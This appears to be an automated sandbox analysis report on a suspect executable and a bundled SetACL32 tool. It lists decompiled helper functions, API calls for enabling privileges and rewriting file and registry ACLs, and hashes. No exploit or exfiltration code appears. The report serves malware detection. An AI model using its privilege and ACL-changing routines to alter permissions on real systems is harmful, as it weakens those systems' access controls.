                Similarity
                • API ID: CloseCreateHandleProcess
                • String ID: Error launching installer
                • API String ID: 3712363035-66219284
                • Opcode ID: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
                • Instruction ID: a14d50d96640d218925096829ca07d1800dc2b789f456133151d87fd2ad2a836
                • Opcode Fuzzy Hash: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
                • Instruction Fuzzy Hash: 9EE046F0640209BFEB109FA0ED49F7F7AACEB00704F404921BD00F2290E67499088A7C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00403720() {
                				void* _t2;
                				void* _t3;
                				void* _t6;
                				void* _t8;
                
                				_t8 =  *0x429834; // 0x0
                				_t3 = E00403705(_t2, 0);
                				if(_t8 != 0) {
                					do {
                						_t6 = _t8;
                						_t8 =  *_t8;
                						FreeLibrary( *(_t6 + 8));
                						_t3 = GlobalFree(_t6);
                					} while (_t8 != 0);
                				}
                				 *0x429834 =  *0x429834 & 0x00000000;
                				return _t3;
                			}

                APIs
                • FreeLibrary.KERNEL32(?,772EFA90,00000000,C:\Users\user~1\AppData\Local\Temp\,004036F8,00403512,?,?,00000006,00000008,0000000A), ref: 0040373A
                • GlobalFree.KERNEL32 ref: 00403741
                Strings
                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403720
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: Free$GlobalLibrary
                • String ID: C:\Users\user~1\AppData\Local\Temp\
                • API String ID: 1100898210-2382934351
                • Opcode ID: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
                • Instruction ID: 7d8ce370987dd57b7bf148727d206b09ac62311aee63c146eb442539f55f5a8e
                • Opcode Fuzzy Hash: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
                • Instruction Fuzzy Hash: 39E0C27391212097C7313F54EE0871ABBA86F46B22F0A403AE8407B26487745C428BCC
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405944(char* _a4) {
                				char* _t3;
                				char* _t5;
                
                				_t5 = _a4;
                				_t3 =  &(_t5[lstrlenA(_t5)]);
                				while( *_t3 != 0x5c) {
                					_t3 = CharPrevA(_t5, _t3);
                					if(_t3 > _t5) {
                						continue;
                					}
                					break;
                				}
                				 *_t3 =  *_t3 & 0x00000000;
                				return  &(_t3[1]);
                			}

                APIs
                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402DB4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ptmhbplhxb.exe,C:\Users\user\Desktop\Ptmhbplhxb.exe,80000000,00000003), ref: 0040594A
                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DB4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ptmhbplhxb.exe,C:\Users\user\Desktop\Ptmhbplhxb.exe,80000000,00000003), ref: 00405958
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: CharPrevlstrlen
                • String ID: C:\Users\user\Desktop
                • API String ID: 2709904686-3976562730
                • Opcode ID: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                • Instruction ID: 9e2646df26482555437471894173605ef17f2c9d125cfcd2b42401f98a5df656
                • Opcode Fuzzy Hash: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                • Instruction Fuzzy Hash: D6D0C9A240DDB1AEE70363249C04B9F6A88DF17710F0944A6E180B61A5C77C4D828BAD
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                 			E00405A63(void* __ecx, CHAR* _a4, CHAR* _a8) {
                 				int _v8;
                 				int _t12;
                 				int _t14;
                 				int _t15;
                 				CHAR* _t17;
                 				CHAR* _t27;
                 
                 				_t12 = lstrlenA(_a8);                                  // 0x00405a73
                 				_t27 = _a4;                                            // 0x00405a75
                 				_v8 = _t12;                                            // 0x00405a78
                 				while(lstrlenA(_t27) >= _v8) {                         // 0x00405aa4
                 					_t14 = _v8;                                        // 0x00405a7d
                 					*(_t14 + _t27) = *(_t14 + _t27) & 0x00000000;      // 0x00405a86
                 					_t15 = lstrcmpiA(_t27, _a8);                       // 0x00405a8b
                 					_t27[_v8] = *(_t14 + _t27);                        // 0x00405a96
                 					if(_t15 == 0) {                                    // 0x00405a99
                 						_t17 = _t27;                                   // 0x00405ab5
                 					} else {                                           // 0x00405a9b
                 						_t27 = CharNextA(_t27);                        // 0x00405aa2
                 						continue;                                      // 0x00000000
                 					}                                                  // 0x00405aa2
                 					L5:                                                // 0x00405aae
                 					return _t17;                                       // 0x00405ab2
                 				}                                                      // 0x00405ab2
                 				_t17 = 0;                                              // 0x00405aac
                 				goto L5;                                               // 0x00000000
                 			}

                APIs
                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A73
                • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A8B
                • CharNextA.USER32(00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A9C
                • lstrlenA.KERNEL32(00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AA5
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: lstrlen$CharNextlstrcmpi
                • String ID:
                • API String ID: 190613189-0
                • Opcode ID: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                • Instruction ID: de8867e187cffd76a1833f018909c3af52f45fcf8c0597c8515af2ce59788131
                • Opcode Fuzzy Hash: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                • Instruction Fuzzy Hash: F5F0C231201818AFCB02DBA4CD80D9EBBA8EF46350B2540B9E840F7211D774DE019FA9
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • std::locale::_Init.LIBCPMT ref: 00F74D1C
                • FindFirstFileW.KERNEL32(?,?,?,00000000,00000002,?,00000002,\*.*,00000004), ref: 00F75463
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F75488
                • std::locale::_Init.LIBCPMT ref: 00F75AA6
                • std::locale::_Init.LIBCPMT ref: 00F75DB8
                • std::locale::_Init.LIBCPMT ref: 00F74EDF
                  • Part of subcall function 00F698F0: EnterCriticalSection.KERNEL32(00FCB6D4,746D712B,?), ref: 00F69982
                  • Part of subcall function 00F698F0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00F699CB
                  • Part of subcall function 00F698F0: GetCurrentThreadId.KERNEL32 ref: 00F699EE
                  • Part of subcall function 00F698F0: GetUserNameExW.SECUR32(00000002,00000000,00000000), ref: 00F69A2A
                  • Part of subcall function 00F698F0: GetLastError.KERNEL32 ref: 00F69A34
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                 • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Initstd::locale::_$ErrorFileLastTime$CriticalCurrentEnterFindFirstNameSectionSystemThreadUser
                • String ID: @M)w$RecurseDires$RegKeyFixPathAndOpen$Unintentionally the following registry key was created: <$You just accessed permissions on a file system root, not on the root of the drive. These very special permissions do not persist a$You just accessed permissions on a file system root, not on the root of the drive. These very special permissions do not persist a$\*.*$classes_root$current_user$hkcr$hkcu$hkey_classes_root$hkey_current_user$hkey_local_machine$hkey_users$hklm$hku$machine$users
                • API String ID: 3540323880-953956231
                • Opcode ID: 4484678930e3fef50912867c3dea876af09d7d77a885f7714673fd8a284fa202
                • Instruction ID: 174c05517183138dd5e2986b5f26a68b8c6178cc7f685202f597472deaac5e10
                • Opcode Fuzzy Hash: 4484678930e3fef50912867c3dea876af09d7d77a885f7714673fd8a284fa202
                • Instruction Fuzzy Hash: A003D070E006188FEF24DF64CC89BDDB7B1AF44314F14819AE809AB291DB75AE85DF52
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • EnterCriticalSection.KERNEL32(00FCB6D4,746D712B,?), ref: 00F69982
                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00F699CB
                • GetCurrentThreadId.KERNEL32 ref: 00F699EE
                • GetUserNameExW.SECUR32(00000002,00000000,00000000), ref: 00F69A2A
                • GetLastError.KERNEL32 ref: 00F69A34
                • GetUserNameExW.SECUR32(00000002,00000000,00000000), ref: 00F69A9B
                • GetLastError.KERNEL32 ref: 00F69AA5
                • LeaveCriticalSection.KERNEL32(00FCB6D4), ref: 00F69BCC
                • LeaveCriticalSection.KERNEL32(00FCB6D4), ref: 00F69D45
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                 • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: CriticalSection$ErrorLastLeaveNameTimeUser$CurrentEnterFileSystemThread
                • String ID: %d,$%s$+qmt$@M)w$CRTCL,$DEBUG,$ERROR,$INFO ,$NONE ,$UNKNW,$WARN ,
                • API String ID: 4039181498-3974024656
                • Opcode ID: cdcfea05ce20cd2522bd232802c44032c67bebf74b8ed27af99d741ed2d6beab
                • Instruction ID: 0989db5c7a230df5bbb64ac17e11f1128b1491c22a4ec4eed236f97eab6a4666
                • Opcode Fuzzy Hash: cdcfea05ce20cd2522bd232802c44032c67bebf74b8ed27af99d741ed2d6beab
                • Instruction Fuzzy Hash: 1EE19870E04208CFDB14CFA8C885B9EBBB9FF49304F24452DE845EB291D7B5AA45EB51
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCurrentProcess.KERNEL32(00000028,?,746D712B), ref: 00F62208
                • OpenProcessToken.ADVAPI32(00000000), ref: 00F6220F
                • GetLastError.KERNEL32 ref: 00F62219
                • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00F6223C
                • GetLastError.KERNEL32(?,?,?), ref: 00F62246
                • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00F62254
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                 • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLastProcess$CloseCurrentHandleLookupOpenPrivilegeTokenValue
                • String ID: failed with: $ the privilege $@M)w$Enabling$SetPrivilege
                • API String ID: 4232854991-2774483167
                • Opcode ID: d374d22c75d7a2f2bfb62863485ebf9addf3fd490ca099c074f5263ded82f411
                • Instruction ID: 51517752ff7d005b5a5d3c3ba4ba9bcddb115550c630cc210a8179ddce7f18e5
                • Opcode Fuzzy Hash: d374d22c75d7a2f2bfb62863485ebf9addf3fd490ca099c074f5263ded82f411
                • Instruction Fuzzy Hash: 58C10471E00208DFEB14DF64CD89B9DB776FF85304F108258E405AB295DB79AA84EF61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • std::locale::_Init.LIBCPMT ref: 00F76FFB
                  • Part of subcall function 00F89DCB: __EH_prolog3.LIBCMT ref: 00F89DD2
                  • Part of subcall function 00F89DCB: std::_Lockit::_Lockit.LIBCPMT ref: 00F89DDD
                  • Part of subcall function 00F89DCB: std::locale::_Setgloballocale.LIBCPMT ref: 00F89DF8
                  • Part of subcall function 00F89DCB: std::_Lockit::~_Lockit.LIBCPMT ref: 00F89E4E
                  • Part of subcall function 00F698F0: EnterCriticalSection.KERNEL32(00FCB6D4,746D712B,?), ref: 00F69982
                  • Part of subcall function 00F698F0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00F699CB
                  • Part of subcall function 00F698F0: GetCurrentThreadId.KERNEL32 ref: 00F699EE
                  • Part of subcall function 00F698F0: GetUserNameExW.SECUR32(00000002,00000000,00000000), ref: 00F69A2A
                  • Part of subcall function 00F698F0: GetLastError.KERNEL32 ref: 00F69A34
                • LocalFree.KERNEL32(?), ref: 00F77C57
                • SetEntriesInAclW.ADVAPI32(?,?,?,?), ref: 00F78538
                • SetEntriesInAclW.ADVAPI32(?,?,?,?), ref: 00F7873E
                  • Part of subcall function 00F87820: IsValidSid.ADVAPI32(00000000,00000000,00000000,00F89605,?,00F897F0,00F89605,00000000,000000FF), ref: 00F8783E
                  • Part of subcall function 00F87820: IsValidSid.ADVAPI32(000C46C7,?,00F897F0,00F89605,00000000,000000FF), ref: 00F8784B
                  • Part of subcall function 00F87820: GetLengthSid.ADVAPI32(000C46C7,?,00F897F0,00F89605,00000000,000000FF), ref: 00F87852
                  • Part of subcall function 00F87820: CopySid.ADVAPI32(00F897F0,00000000,000C46C7,00F897F0,00F89605,00000000,000000FF), ref: 00F87871
                • LocalFree.KERNEL32(?,?,?,?,?,?), ref: 00F77C69
                  • Part of subcall function 00F688E0: GetLastError.KERNEL32(746D712B,00000000,00000000), ref: 00F68960
                  • Part of subcall function 00F698F0: GetUserNameExW.SECUR32(00000002,00000000,00000000), ref: 00F69A9B
                  • Part of subcall function 00F698F0: GetLastError.KERNEL32 ref: 00F69AA5
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                 • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast$EntriesFreeLocalLockitNameTimeUserValidstd::_std::locale::_$CopyCriticalCurrentEnterFileH_prolog3InitLengthLockit::_Lockit::~_SectionSetgloballocaleSystemThread
                • String ID: ($> because a filter keyword matched.$> failed with: $Omitting ACL of: <$Processing ACL of: <$Reading the SD from <$SetEntriesInAcl for DACL of <$SetEntriesInAcl for SACL of <$Write2SD$Writing SD to <
                • API String ID: 2526728192-3089814054
                • Opcode ID: 8f20486d97061b847d0a6986ac862324687b7b78dbe2f58ef13ff4eb7f93b4ab
                • Instruction ID: 4950ecb0a785162653b42f289d62c7196d7fb729e846b055ff769704d89fd10e
                • Opcode Fuzzy Hash: 8f20486d97061b847d0a6986ac862324687b7b78dbe2f58ef13ff4eb7f93b4ab
                • Instruction Fuzzy Hash: 33031771E102488BEF25DF28CC89BDDB7B2AF85304F148199E40DAB291DB74AE85DF51
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetLastError.KERNEL32(746D712B,00000000,00000000), ref: 00F68960
                • #13.ACTIVEDS(?,?,00000103,?,00000103,746D712B,00000000,00000000), ref: 00F68AFB
                • SysStringByteLen.OLEAUT32(?), ref: 00F68B67
                • SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 00F68B75
                • SysFreeString.OLEAUT32(-00000001), ref: 00F68BE8
                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,746D712B,00000000,00000000), ref: 00F68C31
                • LoadLibraryExW.KERNEL32(pdh.dll,00000000,00000002,746D712B,00000000,00000000), ref: 00F68C6F
                • FormatMessageW.KERNELBASE(00001300,00000000,00000000,00000400,?,00000000,00000000,746D712B,00000000,00000000), ref: 00F68C9E
                • LocalFree.KERNEL32(00000000,00000000,-00000002), ref: 00F68CD7
                • FreeLibrary.KERNEL32(00000000), ref: 00F68CF4
                • _com_issue_error.COMSUPP ref: 00F68D66
                • _com_issue_error.COMSUPP ref: 00F68D70
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                 • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: FreeLibraryString$ByteLoad_com_issue_error$AllocErrorFormatLastLocalMessage
                • String ID: @M)w$netmsg.dll$pdh.dll
                • API String ID: 2660706180-3819766224
                • Opcode ID: b557519441872182f3b2864942e8769c2e5b0297d680d500f1d8106ae65f684b
                • Instruction ID: f8a968b868d156493d76e458066d30f9eeff86c2e6c081c6a043ef4c2960ec9c
                • Opcode Fuzzy Hash: b557519441872182f3b2864942e8769c2e5b0297d680d500f1d8106ae65f684b
                • Instruction Fuzzy Hash: 6DC116B0E002188BDB20DF14CC957AAB7B4EF44754F10429DE909E7281DF78AE85DFA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LookupAccountNameW.ADVAPI32(00000000,00FBC3E4,00000000,?,00000000,00F87EBC,?), ref: 00F88DAE
                • GetLastError.KERNEL32(?,?,?,?,00000000,00FACD15,000000FF,?,00F87EBC,00000000,?), ref: 00F88DBA
                • GetLastError.KERNEL32(?,?,?,?,00000000,00FACD15,000000FF,?,00F87EBC,00000000,?), ref: 00F88DC1
                • LookupAccountNameW.ADVAPI32(00000000,00000000,00000000,?,00000000,00F87EBC,?), ref: 00F88ED9
                • GetLastError.KERNEL32(?,?,?,?,00000000,00FACD15,000000FF,?,00F87EBC,00000000,?), ref: 00F88EE3
                • IsValidSid.ADVAPI32(00000000,000000FF,000000FD,?,?,?,?,00000000,00FACD15,000000FF,?,00F87EBC,00000000,?), ref: 00F88F25
                • IsValidSid.ADVAPI32(00000000,?,?,?,?,00000000,00FACD15,000000FF,?,00F87EBC,00000000,?), ref: 00F88F45
                • GetLengthSid.ADVAPI32(00000000,?,?,?,?,00000000,00FACD15,000000FF,?,00F87EBC,00000000,?), ref: 00F88F50
                • CopySid.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,00000000,00FACD15,000000FF,?,00F87EBC,00000000,?), ref: 00F88F6F
                • Concurrency::cancel_current_task.LIBCPMT ref: 00F89001
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                 • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast$AccountLookupNameValid$Concurrency::cancel_current_taskCopyLength
                • String ID: @M)w
                • API String ID: 2417659792-1211491014
                • Opcode ID: 44ed20a6c1ca6433928221a012bb27f6b8080352ff6b2dc5276fd16832dfcb90
                • Instruction ID: 1b4f0b5816026a1383f4a88fe88547ed26741c5db3ef88b0222b9524568d6793
                • Opcode Fuzzy Hash: 44ed20a6c1ca6433928221a012bb27f6b8080352ff6b2dc5276fd16832dfcb90
                • Instruction Fuzzy Hash: C391CFB2E002049FDB14EFA8DC85BEEB7B9EF48350F544529F905E7284DB709905EBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00F97220: GetLastError.KERNEL32(?,?,?,00F94163,00FC7070,0000000C), ref: 00F97225
                  • Part of subcall function 00F97220: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F94163,00FC7070,0000000C), ref: 00F972C3
                • GetACP.KERNEL32(?,?,?,?,?,?,00F8FBD2,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00F99821
                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00F8FBD2,?,?,?,00000055,?,-00000050,?,?), ref: 00F9984C
                • _wcschr.LIBVCRUNTIME ref: 00F998E0
                • _wcschr.LIBVCRUNTIME ref: 00F998EE
                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00F999AF
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                 • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                • String ID: utf8
                • API String ID: 4147378913-905460609
                • Opcode ID: b7dc67556d4df242cd1ac242c16c6480f4183ddfbd37320a8d03924a996e2222
                • Instruction ID: c0ec1aa1ce4f53fc41b50648d1823ccff4be3ae57e74c16ada2c9a86d96f26b9
                • Opcode Fuzzy Hash: b7dc67556d4df242cd1ac242c16c6480f4183ddfbd37320a8d03924a996e2222
                • Instruction Fuzzy Hash: 99710671A08306AAFF25AB79CC42BBA73ACEF45720F16442DF505DB181EAF4D940E761
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCurrentProcess.KERNEL32(?,?,00F96587,?,?,?,?), ref: 00F965AA
                • TerminateProcess.KERNEL32(00000000,?,00F96587,?,?,?,?), ref: 00F965B1
                • ExitProcess.KERNEL32 ref: 00F965C3
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                 • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Process$CurrentExitTerminate
                • String ID:
                • API String ID: 1703294689-0
                • Opcode ID: 72ed092cddcd9c54cd28b02e8964dd12c45c4d2ef8b1d4c7489ae003f155b12f
                • Instruction ID: 3c234db59ec296e8ceb4614ba8ead88b3f97071cd0a8f4b78bec4dd347b9e4a9
                • Opcode Fuzzy Hash: 72ed092cddcd9c54cd28b02e8964dd12c45c4d2ef8b1d4c7489ae003f155b12f
                • Instruction Fuzzy Hash: D0E04671400108AFEF112F24CC09A5C3B68EB55351B050010F804CA132CB39DD81EB80
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetUnhandledExceptionFilter.KERNELBASE(Function_0003BB88,00F8AF4E), ref: 00F8BB81
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                 • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: d2e85e38cf1d78c7edcf4f5e03d801ca14aba95613f256c78a5974e65a1aa906
                • Instruction ID: 438b6a26dfa752df5609928d2c73b319d135e9519554d2cbfe2a716ee94eff4e
                • Opcode Fuzzy Hash: d2e85e38cf1d78c7edcf4f5e03d801ca14aba95613f256c78a5974e65a1aa906
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                 • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                 • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1e92dcea0e5f5e015b5c7cd50786aa359a0345e38aa1dac2c75e8e7df5a5821f
                • Instruction ID: 8fc2f5f2805ce65c74e4488b19fcf04e72d84015cdd0c658d8ea5dc88e13f818
                • Opcode Fuzzy Hash: 1e92dcea0e5f5e015b5c7cd50786aa359a0345e38aa1dac2c75e8e7df5a5821f
                • Instruction Fuzzy Hash: 83F03035A142249BDF26CB5CC907E5973A8EB45B72F154096E501D7151C374DD40DBD0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateFileW.KERNEL32(?,?,00000000,00000000,00000003,02200000,00000000), ref: 00F7FF15
                • GetKernelObjectSecurity.ADVAPI32(?,?,?,00000000,?), ref: 00F7FF82
                • GetLastError.KERNEL32 ref: 00F7FF9F
                • GetKernelObjectSecurity.ADVAPI32(?,?,00000000,?,?), ref: 00F7FFC0
                • MakeAbsoluteSD.ADVAPI32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?), ref: 00F800A3
                • GetLastError.KERNEL32 ref: 00F800AF
                • GetLastError.KERNEL32 ref: 00F800B6
                • CloseHandle.KERNEL32(00000000), ref: 00F7FFEB
                  • Part of subcall function 00F93434: _free.LIBCMT ref: 00F93447
                • RegCloseKey.ADVAPI32(?), ref: 00F7FFF9
                • GetNamedSecurityInfoW.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,?), ref: 00F80027
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                 • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
